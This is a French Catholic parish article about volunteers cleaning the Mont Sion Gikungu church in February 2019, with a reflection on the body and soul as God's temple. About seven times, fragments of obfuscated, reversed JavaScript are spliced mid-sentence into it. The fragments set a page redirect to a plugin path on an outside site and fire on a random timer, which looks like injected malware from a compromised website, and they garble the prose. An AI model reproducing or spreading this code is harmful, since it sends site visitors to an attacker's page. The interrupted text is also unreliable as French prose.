Le temple du Seigneur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit toujours être propre pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner toute gloire et respect à Dieu trois fois Saint, afin d’accomplir la parole de Dieu du livre de Malachie(1,6) qui dit qu’un fils honore son père et qu’un serviteur craint son maître. Comme le Seigneur est Saint, sa maison toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit aussi être sainte.
C’est vendredi le 8 février 2019. Au Mont Sion Gikungu, l’Eglise de la Sainte Trinité est en train d’être rendue propre par les femmes, les hommes, les filles et garçons. Sous la chaleur du Soleil après son lever, il est 9 heures et quelques. Les uns balayent la cour, d’autres torchonnent à l’intérieur de l’Eglise, pendant qu’il y a ceux qui le font sur les trottoirs. Ils le font non seulement dans l’entente mais aussi méticuleusement.
Il ne reste qu’une seule journée avant de célébrer le jour du Seigneur. C’est la raison qui a fait que certains des fidèles se consacrent, et ils sont venus faire la propreté. C’est un geste d’amour envers Dieu et envers tous les fidèles qui viendront célébrer, ils vont se sentir à l’aise.
Néanmoins, le temple de Dieu n’est seulement pas ces édifices faits par les hommes, c’est aussi l’âme et le corps de chaque chrétien. Saint Paul Apôtre dans sa première épître aux Corinthiens leur a dit qu’ils sont le temple du Seigneur. C’est ainsi qu’il leur a signalé que le temple de Dieu est sacré et que ce temple, c’est eux-mêmes. (I Cor 3, 16-17)
Comment entrer dans le temple du Seigneur ?
Au Mont Sion comme dans toutes les Eglises, avant le dimanche, les fidèles préparent le temple. Ils enlèvent toute saleté et l’édifice devient sain. Ainsi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être pour le cœur et le corps de tout un chacun. L’édifice reste toujours propre, ainsi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être le cœur de chaque chrétien. Le psaume 24 répond bien à cette question: »Qui montera sur la montagne de Dieu? » C’est l’homme aux mains nettes, au cœur pur. »(Ps 24,3-4)
Les fidèles toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent être dignes pour entrer dans le temple. Dieu est saint, son temple l’est aussi. Les chrétiens sont à leur tour appelés à la sainteté. «…à l’exemple du Saint qui vous a appelés, devenez saints vous aussi dans votre conduite, selon qu’il est écrit : vous serez saints, parce que moi, je suis Saint. (1P, 1,15-16) » Et Jésus d’ajouter : « soyez parfaits comme votre Père céleste est parfait.» (Mat 5,48). Mieux est de préparer l’édifice et le meilleur est de purifier le temple en corps et en âme.
Au Sanctuaire marial de Schoenstatt, l’entretien est régulier car c’est un lieu de pèlerinage. Mais par excellence, pendant ces jours qui préparent le jubilé de 25 ans d’existence du Sanctuaire Marial de Schoenstatt.
Signalons que le travail d’entretien se fait chaque vendredi de la semaine.
Brigitte IRAKOZE